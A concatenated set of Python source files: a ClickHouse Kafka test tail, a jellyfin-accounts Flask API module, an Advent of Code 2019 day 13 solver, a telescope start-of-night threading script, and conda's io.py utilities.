extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
web_api.py
|
# A bit of a mess, but mostly does API endpoints and a couple compatability fixes
from flask import request, jsonify
from jellyfin_accounts.jf_api import Jellyfin
import json
import datetime
import secrets
import time
import threading
import os
import sys
import psutil
from jellyfin_accounts import (
config,
config_path,
app,
g,
data_store,
resp,
configparser,
config_base_path,
)
from jellyfin_accounts.email import Mailgun, Smtp
from jellyfin_accounts import web_log as log
from jellyfin_accounts.validate_password import PasswordValidator
def format_datetime(dt):
result = dt.strftime(config["email"]["date_format"])
if config.getboolean("email", "use_24h"):
result += f' {dt.strftime("%H:%M")}'
else:
result += f' {dt.strftime("%I:%M %p")}'
return result
def checkInvite(code, used=False, username=None):
current_time = datetime.datetime.now()
invites = dict(data_store.invites)
match = False
for invite in invites:
if (
"remaining-uses" not in invites[invite]
and "no-limit" not in invites[invite]
):
invites[invite]["remaining-uses"] = 1
expiry = datetime.datetime.strptime(
invites[invite]["valid_till"], "%Y-%m-%dT%H:%M:%S.%f"
)
if current_time >= expiry or (
"no-limit" not in invites[invite] and invites[invite]["remaining-uses"] < 1
):
log.debug(f"Housekeeping: Deleting expired invite {invite}")
if (
config.getboolean("notifications", "enabled")
and "notify" in invites[invite]
):
for address in invites[invite]["notify"]:
if "notify-expiry" in invites[invite]["notify"][address]:
if invites[invite]["notify"][address]["notify-expiry"]:
method = config["email"]["method"]
if method == "mailgun":
email = Mailgun(address)
elif method == "smtp":
email = Smtp(address)
if email.construct_expiry(
{"code": invite, "expiry": expiry}
):
threading.Thread(target=email.send).start()
del data_store.invites[invite]
elif invite == code:
match = True
if used:
delete = False
inv = dict(data_store.invites[code])
if "used-by" not in inv:
inv["used-by"] = []
if "remaining-uses" in inv:
if inv["remaining-uses"] == 1:
delete = True
del data_store.invites[code]
elif "no-limit" not in invites[invite]:
inv["remaining-uses"] -= 1
inv["used-by"].append([username, format_datetime(current_time)])
if not delete:
data_store.invites[code] = inv
return match
jf = Jellyfin(
config["jellyfin"]["server"],
config["jellyfin"]["client"],
config["jellyfin"]["version"],
config["jellyfin"]["device"],
config["jellyfin"]["device_id"],
)
from jellyfin_accounts.login import auth
jf_address = config["jellyfin"]["server"]
success = False
for i in range(3):
try:
jf.authenticate(config["jellyfin"]["username"], config["jellyfin"]["password"])
success = True
log.info(f"Successfully authenticated with {jf_address}")
break
except Jellyfin.AuthenticationError:
log.error(f"Failed to authenticate with {jf_address}, Retrying...")
time.sleep(5)
if not success:
log.error("Could not authenticate after 3 tries.")
exit()
# Temporary fixes below.
def switchToIds():
try:
with open(config["files"]["emails"], "r") as f:
emails = json.load(f)
except (FileNotFoundError, json.decoder.JSONDecodeError):
emails = {}
users = jf.getUsers(public=False)
new_emails = {}
match = False
for key in emails:
for user in users:
if user["Name"] == key:
match = True
new_emails[user["Id"]] = emails[key]
elif user["Id"] == key:
new_emails[user["Id"]] = emails[key]
if match:
from pathlib import Path
email_file = Path(config["files"]["emails"]).name
log.info(
(
f"{email_file} modified to use userID instead of "
+ "usernames. These will be used in future."
)
)
emails = new_emails
with open(config["files"]["emails"], "w") as f:
f.write(json.dumps(emails, indent=4))
# Temporary, switches emails.json over from using Usernames to User IDs.
switchToIds()
from packaging import version
if (
version.parse(jf.info["Version"]) >= version.parse("10.6.0")
and bool(data_store.user_template) is not False
):
if (
data_store.user_template["AuthenticationProviderId"]
== "Emby.Server.Implementations.Library.DefaultAuthenticationProvider"
):
log.info("Updating user_template for Jellyfin >= 10.6.0")
data_store.user_template[
"AuthenticationProviderId"
] = "Jellyfin.Server.Implementations.Users.DefaultAuthenticationProvider"
if (
data_store.user_template["PasswordResetProviderId"]
== "Emby.Server.Implementations.Library.DefaultPasswordResetProvider"
):
data_store.user_template[
"PasswordResetProviderId"
] = "Jellyfin.Server.Implementations.Users.DefaultPasswordResetProvider"
def validator():
if config.getboolean("password_validation", "enabled"):
return PasswordValidator(
config["password_validation"]["min_length"],
config["password_validation"]["upper"],
config["password_validation"]["lower"],
config["password_validation"]["number"],
config["password_validation"]["special"],
)
return PasswordValidator(0, 0, 0, 0, 0)
@app.route("/newUser", methods=["POST"])
def newUser():
data = request.get_json()
log.debug("Attempted newUser")
if checkInvite(data["code"]):
validation = validator().validate(data["password"])
valid = True
for criterion in validation:
if validation[criterion] is False:
valid = False
if valid:
log.debug("User password valid")
try:
user = jf.newUser(data["username"], data["password"])
except Jellyfin.UserExistsError:
error = f'User already exists named {data["username"]}'
log.debug(error)
return jsonify({"error": error})
except:
return jsonify({"error": "Unknown error"})
invites = dict(data_store.invites)
checkInvite(data["code"], used=True, username=data["username"])
if (
config.getboolean("notifications", "enabled")
and "notify" in invites[data["code"]]
):
for address in invites[data["code"]]["notify"]:
if "notify-creation" in invites[data["code"]]["notify"][address]:
if invites[data["code"]]["notify"][address]["notify-creation"]:
method = config["email"]["method"]
if method == "mailgun":
email = Mailgun(address)
elif method == "smtp":
email = Smtp(address)
if email.construct_created(
{
"code": data["code"],
"username": data["username"],
"created": datetime.datetime.now(),
}
):
threading.Thread(target=email.send).start()
if user.status_code == 200:
try:
policy = data_store.user_template
if policy != {}:
jf.setPolicy(user.json()["Id"], policy)
else:
log.debug("user policy was blank")
except:
log.error("Failed to set new user policy")
try:
configuration = data_store.user_configuration
displayprefs = data_store.user_displayprefs
if configuration != {} and displayprefs != {}:
if jf.setConfiguration(user.json()["Id"], configuration):
jf.setDisplayPreferences(user.json()["Id"], displayprefs)
log.debug("Set homescreen layout.")
else:
log.debug("user configuration and/or displayprefs were blank")
except:
log.error("Failed to set new user homescreen layout")
if config.getboolean("password_resets", "enabled"):
data_store.emails[user.json()["Id"]] = data["email"]
log.debug("Email address stored")
log.info("New user created")
else:
log.error(f"New user creation failed: {user.status_code}")
return resp(False)
else:
log.debug("User password invalid")
return jsonify(validation)
else:
log.debug("Attempted newUser unauthorized")
return resp(False, code=401)
@app.route("/generateInvite", methods=["POST"])
@auth.login_required
def generateInvite():
current_time = datetime.datetime.now()
data = request.get_json()
delta = datetime.timedelta(
days=int(data["days"]), hours=int(data["hours"]), minutes=int(data["minutes"])
)
invite_code = secrets.token_urlsafe(16)
invite = {}
invite["created"] = format_datetime(current_time)
if data["multiple-uses"]:
if data["no-limit"]:
invite["no-limit"] = True
else:
invite["remaining-uses"] = int(data["remaining-uses"])
else:
invite["remaining-uses"] = 1
log.debug(f"Creating new invite: {invite_code}")
valid_till = current_time + delta
invite["valid_till"] = valid_till.strftime("%Y-%m-%dT%H:%M:%S.%f")
if "email" in data and config.getboolean("invite_emails", "enabled"):
address = data["email"]
invite["email"] = address
log.info(f"Sending invite to {address}")
method = config["email"]["method"]
if method == "mailgun":
from jellyfin_accounts.email import Mailgun
email = Mailgun(address)
elif method == "smtp":
from jellyfin_accounts.email import Smtp
email = Smtp(address)
email.construct_invite({"expiry": valid_till, "code": invite_code})
response = email.send()
if response is False or type(response) != bool:
invite["email"] = f"Failed to send to {address}"
if config.getboolean("notifications", "enabled"):
if "notify-creation" in data:
invite["notify-creation"] = data["notify-creation"]
if "notify-expiry" in data:
invite["notify-expiry"] = data["notify-expiry"]
data_store.invites[invite_code] = invite
log.info(f"New invite created: {invite_code}")
return resp()
@app.route("/getInvites", methods=["GET"])
@auth.login_required
def getInvites():
log.debug("Invites requested")
current_time = datetime.datetime.now()
invites = dict(data_store.invites)
for code in invites:
checkInvite(code)
invites = dict(data_store.invites)
response = {"invites": []}
for code in invites:
expiry = datetime.datetime.strptime(
invites[code]["valid_till"], "%Y-%m-%dT%H:%M:%S.%f"
)
valid_for = expiry - current_time
invite = {
"code": code,
"days": valid_for.days,
"hours": valid_for.seconds // 3600,
"minutes": (valid_for.seconds // 60) % 60,
}
if "created" in invites[code]:
invite["created"] = invites[code]["created"]
if "used-by" in invites[code]:
invite["used-by"] = invites[code]["used-by"]
if "no-limit" in invites[code]:
invite["no-limit"] = invites[code]["no-limit"]
if "remaining-uses" in invites[code]:
invite["remaining-uses"] = invites[code]["remaining-uses"]
else:
invite["remaining-uses"] = 1
if "email" in invites[code]:
invite["email"] = invites[code]["email"]
if "notify" in invites[code]:
if config.getboolean("ui", "jellyfin_login"):
address = data_store.emails[g.user.id]
else:
address = config["ui"]["email"]
if address in invites[code]["notify"]:
if "notify-expiry" in invites[code]["notify"][address]:
invite["notify-expiry"] = invites[code]["notify"][address][
"notify-expiry"
]
if "notify-creation" in invites[code]["notify"][address]:
invite["notify-creation"] = invites[code]["notify"][address][
"notify-creation"
]
response["invites"].append(invite)
return jsonify(response)
@app.route("/deleteInvite", methods=["POST"])
@auth.login_required
def deleteInvite():
code = request.get_json()["code"]
invites = dict(data_store.invites)
if code in invites:
del data_store.invites[code]
log.info(f"Invite deleted: {code}")
return resp()
@app.route("/getToken")
@auth.login_required
def get_token():
token = g.user.generate_token()
return jsonify({"token": token.decode("ascii")})
@app.route("/getUsers", methods=["GET"])
@auth.login_required
def getUsers():
log.debug("User and email list requested")
response = {"users": []}
users = jf.getUsers(public=False)
emails = data_store.emails
for user in users:
entry = {"name": user["Name"]}
if user["Id"] in emails:
entry["email"] = emails[user["Id"]]
response["users"].append(entry)
return jsonify(response)
@app.route("/modifyUsers", methods=["POST"])
@auth.login_required
def modifyUsers():
data = request.get_json()
log.debug("Email list modification requested")
for key in data:
uid = jf.getUsers(key, public=False)["Id"]
data_store.emails[uid] = data[key]
log.debug(f'Email for user "{key}" modified')
return resp()
@app.route("/setDefaults", methods=["POST"])
@auth.login_required
def setDefaults():
data = request.get_json()
username = data["username"]
log.debug(f"Storing default settings from user {username}")
try:
user = jf.getUsers(username=username, public=False)
except Jellyfin.UserNotFoundError:
log.error(f"Storing defaults failed: Couldn't find user {username}")
return resp(False)
uid = user["Id"]
policy = user["Policy"]
data_store.user_template = policy
if data["homescreen"]:
configuration = user["Configuration"]
try:
displayprefs = jf.getDisplayPreferences(uid)
data_store.user_configuration = configuration
data_store.user_displayprefs = displayprefs
except:
log.error("Storing defaults failed: " + "couldn't store homescreen layout")
return resp(False)
return resp()
@app.route("/modifyConfig", methods=["POST"])
@auth.login_required
def modifyConfig():
global config
log.info("Config modification requested")
data = request.get_json()
temp_config = configparser.RawConfigParser(
comment_prefixes="/", allow_no_value=True
)
temp_config.read(str(config_path.resolve()))
for section in data:
if section in temp_config and 'restart-program' not in section:
for item in data[section]:
temp_config[section][item] = data[section][item]
data[section][item] = True
log.debug(f"{section}/{item} modified")
with open(config_path, "w") as config_file:
temp_config.write(config_file)
config.trigger_reload()
log.info("Config written.")
if 'restart-program' in data:
if data['restart-program']:
log.info('Restarting...')
try:
proc = psutil.Process(os.getpid())
for handler in proc.open_files() + proc.connections():
os.close(handler.fd)
except Exception as e:
log.error(f'Failed restart: {type(e).__name__}')
python = sys.executable
os.execl(python, python, *sys.argv)
return resp()
@app.route("/getConfig", methods=["GET"])
@auth.login_required
def getConfig():
log.debug("Config requested")
with open(config_base_path, "r") as f:
config_base = json.load(f)
# config.read(config_path)
response_config = config_base
for section in config_base:
for entry in config_base[section]:
if entry in config[section]:
response_config[section][entry]["value"] = config[section][entry]
return jsonify(response_config), 200
@app.route("/setNotify", methods=["POST"])
@auth.login_required
def setNotify():
data = request.get_json()
change = False
for code in data:
for key in data[code]:
if key in ["notify-expiry", "notify-creation"]:
inv = data_store.invites[code]
if config.getboolean("ui", "jellyfin_login"):
address = data_store.emails[g.user.id]
else:
address = config["ui"]["email"]
if "notify" not in inv:
inv["notify"] = {}
if address not in inv["notify"]:
inv["notify"][address] = {}
inv["notify"][address][key] = data[code][key]
log.debug(f"{code}: Notification settings changed")
change = True
if change:
data_store.invites[code] = inv
return resp()
return resp(success=False)
|
solve.py
|
from time import sleep
from event2019.day13.computer_v4 import Computer_v4
from queue import Queue
from threading import Thread
########
# PART 1
computer = Computer_v4()
computer.load_code("event2019/day13/input.txt")
computer.run()
output = computer.get_output()
screen = {(x, y): t for x, y, t in (zip(*(iter(output),) * 3))}
answer = len({p: t for p, t in screen.items() if t == 2}.keys())
print("Part 1 =", answer)
assert answer == 335 # check with accepted answer
########
# PART 2
def print_screen(screen):
w, h = 0, 0
for x, y in screen.keys():
w = max(w, x)
h = max(h, y)
for y in range(h + 1):
for x in range(w + 1):
c = screen.get((x, y), 0)
if (c == 1):
print(end="█")
elif (c == 2):
print(end="░")
elif (c == 3):
print(end="_")
elif (c == 4):
print(end="∙")
else:
print(end=" ")
print()
print("Score = ", screen.get((-1, 0), 0))
#print_screen(screen)
screen = {}
def get_player_processor():
def input_player(input_func):
ball_x = [x for (x, _), t in screen.items() if t == 4][0]
paddle_x = [x for (x, _), t in screen.items() if t == 3][0]
if paddle_x < ball_x:
return 1
elif paddle_x > ball_x:
return -1
else:
return 0
return input_player
def get_update_screen_processor():
current_command = []
def update_screen(val):
current_command.append(val)
if (len(current_command) == 3):
screen[(current_command[0], current_command[1])] = current_command[2]
current_command.clear()
return update_screen
# setup the brain on a different thread
computer = Computer_v4()
computer.load_code("event2019/day13/input.txt")
computer.set_memory_value(0, 2)
computer_in = Queue()
computer_out = Queue()
computer.set_input_processor(get_player_processor())
computer.set_output_processor(get_update_screen_processor())
t = Thread(target=computer.run, daemon=True, args=(computer_in, computer_out))
t.start()
print("Running")
# wait to complete
t.join()
# get the score
answer = screen[(-1, 0)]
print("Part 2 =", answer)
assert answer == 15706 # check with accepted answer
#print_screen(screen)
|
ocs_start_of_night_thread.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import threading
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(threading.currentThread().getName()))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do start_of_night stuff
if entobj:
# enter control
entobj.logger.info('{0:s}.entercontrol()'.format(entity))
entobj.entercontrol()
# start
entobj.logger.info("{0:s}.start('Normal')".format(entity))
entobj.start('Normal')
# enable
entobj.logger.info('{0:s}.enable()'.format(entity))
entobj.enable()
# return
return
# +
# main()
# -
if __name__ == "__main__":
# created shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = threading.Thread(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s} exited'.format(j.name))
|
io.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, Executor, Future, _base, as_completed # NOQA
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import partial, wraps
import sys
if sys.version_info[0] > 2:
# Not used at present.
from io import BytesIO
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
from threading import Event, Thread, Lock
from time import sleep, time
from .compat import StringIO, iteritems, on_win, encode_environment
from .constants import NULL
from .path import expand
from .._vendor.auxlib.decorators import memoizemethod
from .._vendor.auxlib.logz import NullHandler
from .._vendor.auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
"""
Logging formatter with additional attributes for run time logging.
Attributes:
`delta_secs`:
Elapsed seconds since last log/format call (or creation of logger).
`relative_created_secs`:
Like `relativeCreated`, time relative to the initialization of the
`logging` module but conveniently scaled to seconds as a `float` value.
"""
def __init__(self, fmt=None, datefmt=None):
self.prev_time = time()
super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def format(self, record):
now = time()
prev_time = self.prev_time
self.prev_time = max(self.prev_time, now)
record.delta_secs = now - prev_time
record.relative_created_secs = record.relativeCreated / 1000
return super(DeltaSecondsFormatter, self).format(record)
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
_FORMATTER = DeltaSecondsFormatter(
"%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
else:
_FORMATTER = Formatter(
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
def dashlist(iterable, indent=2):
return ''.join('\n' + ' ' * indent + '- ' + str(x) for x in iterable)
class ContextDecorator(object):
"""Base class for a context manager class (implementing __enter__() and __exit__()) that also
makes it a decorator.
"""
# TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA
def __call__(self, f):
@wraps(f)
def decorated(*args, **kwds):
with self:
return f(*args, **kwds)
return decorated
class SwallowBrokenPipe(ContextDecorator):
# Ignore BrokenPipeError and errors related to stdout or stderr being
# closed by a downstream program.
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_val
and isinstance(exc_val, EnvironmentError)
and getattr(exc_val, 'errno', None)
and exc_val.errno in (EPIPE, ESHUTDOWN)):
return True
swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
"""Constants used for contextmanager captured.
Used similarly like the constants PIPE, STDOUT for stdlib's subprocess.Popen.
"""
STRING = -1
STDOUT = -2
@contextmanager
def env_vars(var_map=None, callback=None, stack_callback=None):
if var_map is None:
var_map = {}
new_var_map = encode_environment(var_map)
saved_vars = {}
for name, value in iteritems(new_var_map):
saved_vars[name] = os.environ.get(name, NULL)
os.environ[name] = value
try:
if callback:
callback()
if stack_callback:
stack_callback(True)
yield
finally:
for name, value in iteritems(saved_vars):
if value is NULL:
del os.environ[name]
else:
os.environ[name] = value
if callback:
callback()
if stack_callback:
stack_callback(False)
@contextmanager
def env_var(name, value, callback=None, stack_callback=None):
# Maybe, but in env_vars, not here:
# from conda.compat import ensure_fs_path_encoding
# d = dict({name: ensure_fs_path_encoding(value)})
d = {name: value}
with env_vars(d, callback=callback, stack_callback=stack_callback) as es:
yield es
@contextmanager
def env_unmodified(callback=None):
with env_vars(callback=callback) as es:
yield es
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
"""Capture outputs of sys.stdout and sys.stderr.
If stdout is STRING, capture sys.stdout as a string,
if stdout is None, do not capture sys.stdout, leaving it untouched,
otherwise redirect sys.stdout to the file-like object given by stdout.
Behave correspondingly for stderr with the exception that if stderr is STDOUT,
redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.
Args:
stdout: capture target for sys.stdout, one of STRING, None, or file-like object
stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object
Yields:
CapturedText: has attributes stdout, stderr which are either strings, None or the
corresponding file-like function argument.
"""
# NOTE: This function is not thread-safe. Using within multi-threading may cause spurious
# behavior of not returning sys.stdout and sys.stderr back to their 'proper' state
# """
# Context manager to capture the printed output of the code in the with block
#
# Bind the context manager to a variable using `as` and the result will be
# in the stdout property.
#
# >>> from conda.common.io import captured
# >>> with captured() as c:
# ... print('hello world!')
# ...
# >>> c.stdout
# 'hello world!\n'
# """
def write_wrapper(self, to_write):
# This may have to deal with a *lot* of text.
if hasattr(self, 'mode') and 'b' in self.mode:
wanted = bytes
elif sys.version_info[0] == 3 and isinstance(self, BytesIO):
wanted = bytes
else:
# ignore flake8 on this because it finds an error on py3 even though it is guarded
if sys.version_info[0] == 2:
wanted = unicode # NOQA
else:
wanted = str
if not isinstance(to_write, wanted):
if hasattr(to_write, 'decode'):
decoded = to_write.decode('utf-8')
self.old_write(decoded)
elif hasattr(to_write, 'encode'):
b = to_write.encode('utf-8')
self.old_write(b)
else:
self.old_write(to_write)
class CapturedText(object):
pass
# sys.stdout.write(u'unicode out')
# sys.stdout.write(bytes('bytes out', encoding='utf-8'))
# sys.stdout.write(str('str out'))
saved_stdout, saved_stderr = sys.stdout, sys.stderr
if stdout == CaptureTarget.STRING:
outfile = StringIO()
outfile.old_write = outfile.write
outfile.write = partial(write_wrapper, outfile)
sys.stdout = outfile
else:
outfile = stdout
if outfile is not None:
sys.stdout = outfile
if stderr == CaptureTarget.STRING:
errfile = StringIO()
errfile.old_write = errfile.write
errfile.write = partial(write_wrapper, errfile)
sys.stderr = errfile
elif stderr == CaptureTarget.STDOUT:
sys.stderr = errfile = outfile
else:
errfile = stderr
if errfile is not None:
sys.stderr = errfile
c = CapturedText()
log.info("overtaking stderr and stdout")
try:
yield c
finally:
if stdout == CaptureTarget.STRING:
c.stdout = outfile.getvalue()
else:
c.stdout = outfile
if stderr == CaptureTarget.STRING:
c.stderr = errfile.getvalue()
elif stderr == CaptureTarget.STDOUT:
c.stderr = None
else:
c.stderr = errfile
sys.stdout, sys.stderr = saved_stdout, saved_stderr
log.info("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
saved_args = sys.argv
sys.argv = args_list
try:
yield
finally:
sys.argv = saved_args
@contextmanager
def _logger_lock():
logging._acquireLock()
try:
yield
finally:
logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
logr = getLogger(logger_name)
_lvl, _dsbld, _prpgt = logr.level, logr.disabled, logr.propagate
null_handler = NullHandler()
with _logger_lock():
logr.addHandler(null_handler)
logr.setLevel(CRITICAL + 1)
logr.disabled, logr.propagate = True, False
try:
yield
finally:
with _logger_lock():
logr.removeHandler(null_handler) # restore list logr.handlers
logr.level, logr.disabled = _lvl, _dsbld
logr.propagate = _prpgt
@contextmanager
def stderr_log_level(level, logger_name=None):
logr = getLogger(logger_name)
_hndlrs, _lvl, _dsbld, _prpgt = logr.handlers, logr.level, logr.disabled, logr.propagate
handler = StreamHandler(sys.stderr)
handler.name = 'stderr'
handler.setLevel(level)
handler.setFormatter(_FORMATTER)
with _logger_lock():
logr.setLevel(level)
logr.handlers, logr.disabled, logr.propagate = [], False, False
logr.addHandler(handler)
logr.setLevel(level)
try:
yield
finally:
with _logger_lock():
logr.handlers, logr.level, logr.disabled = _hndlrs, _lvl, _dsbld
logr.propagate = _prpgt
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
# get old stderr logger
logr = getLogger(logger_name)
old_stderr_handler = next((handler for handler in logr.handlers if handler.name == 'stderr'),
None)
# create new stderr logger
new_stderr_handler = StreamHandler(sys.stderr)
new_stderr_handler.name = 'stderr'
new_stderr_handler.setLevel(NOTSET)
new_stderr_handler.setFormatter(formatter or _FORMATTER)
# do the switch
with _logger_lock():
if old_stderr_handler:
logr.removeHandler(old_stderr_handler)
logr.addHandler(new_stderr_handler)
logr.setLevel(level)
logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
"""Enforce a maximum time for a callable to complete.
Not yet implemented on Windows.
"""
default_return = kwargs.pop('default_return', None)
if on_win:
# Why does Windows have to be so difficult all the time? Kind of gets old.
# Guess we'll bypass Windows timeouts for now.
try:
return func(*args, **kwargs)
except KeyboardInterrupt: # pragma: no cover
return default_return
else:
class TimeoutException(Exception):
pass
def interrupt(signum, frame):
raise TimeoutException()
signal.signal(signal.SIGALRM, interrupt)
signal.alarm(timeout_secs)
try:
ret = func(*args, **kwargs)
signal.alarm(0)
return ret
except (TimeoutException, KeyboardInterrupt): # pragma: no cover
return default_return
class Spinner(object):
"""
Args:
message (str):
A message to prefix the spinner with. The string ': ' is automatically appended.
enabled (bool):
If False, usage is a no-op.
json (bool):
If True, will not output non-json to stdout.
"""
# spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
spinner_cycle = cycle('/-\\|')
def __init__(self, message, enabled=True, json=False, fail_message="failed\n"):
self.message = message
self.enabled = enabled
self.json = json
self._stop_running = Event()
self._spinner_thread = Thread(target=self._start_spinning)
self._indicator_length = len(next(self.spinner_cycle)) + 1
self.fh = sys.stdout
self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
self.fail_message = fail_message
def start(self):
if self.show_spin:
self._spinner_thread.start()
elif not self.json:
self.fh.write("...working... ")
self.fh.flush()
def stop(self):
if self.show_spin:
self._stop_running.set()
self._spinner_thread.join()
self.show_spin = False
def _start_spinning(self):
try:
while not self._stop_running.is_set():
self.fh.write(next(self.spinner_cycle) + ' ')
self.fh.flush()
sleep(0.10)
self.fh.write('\b' * self._indicator_length)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.stop()
else:
raise
@swallow_broken_pipe
def __enter__(self):
if not self.json:
sys.stdout.write("%s: " % self.message)
sys.stdout.flush()
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if not self.json:
with swallow_broken_pipe:
if exc_type or exc_val:
sys.stdout.write(self.fail_message)
else:
sys.stdout.write("done\n")
sys.stdout.flush()
class ProgressBar(object):
def __init__(self, description, enabled=True, json=False):
"""
Args:
description (str):
The name of the progress bar, shown on left side of output.
enabled (bool):
If False, usage is a no-op.
json (bool):
If true, outputs json progress to stdout rather than a progress bar.
Currently, the json format assumes this is only used for "fetch", which
maintains backward compatibility with conda 4.3 and earlier behavior.
"""
self.description = description
self.enabled = enabled
self.json = json
if json:
pass
elif enabled:
bar_format = "{desc}{bar} | {percentage:3.0f}% "
try:
self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
file=sys.stdout)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def update_to(self, fraction):
try:
if self.json and self.enabled:
sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
% (self.description, fraction))
elif self.enabled:
self.pbar.update(fraction - self.pbar.n)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def finish(self):
self.update_to(1)
@swallow_broken_pipe
def close(self):
if self.enabled and self.json:
sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
% self.description)
sys.stdout.flush()
elif self.enabled:
self.pbar.close()
# use this for debugging, because ProcessPoolExecutor isn't pdb/ipdb friendly
class DummyExecutor(Executor):
def __init__(self):
self._shutdown = False
self._shutdownLock = Lock()
def submit(self, fn, *args, **kwargs):
with self._shutdownLock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = Future()
try:
result = fn(*args, **kwargs)
except BaseException as e:
f.set_exception(e)
else:
f.set_result(result)
return f
def map(self, func, *iterables):
for iterable in iterables:
for thing in iterable:
yield func(thing)
def shutdown(self, wait=True):
with self._shutdownLock:
self._shutdown = True
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
def __init__(self, max_workers=10):
super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
def submit(self, fn, *args, **kwargs):
"""
This is an exact reimplementation of the `submit()` method on the parent class, except
with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
least one living thread, this thread pool will not throw an exception if threads cannot
be expanded to `max_workers`.
In the implementation, we use "protected" attributes from concurrent.futures (`_base`
and `_WorkItem`). Consider vendoring the whole concurrent.futures library
as an alternative to these protected imports.
https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = _base.Future()
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
try:
self._adjust_thread_count()
except RuntimeError:
# RuntimeError: can't start new thread
# See https://github.com/conda/conda/issues/6624
if len(self._threads) > 0:
# It's ok to not be able to start new threads if we already have at least
# one thread alive.
pass
else:
raise
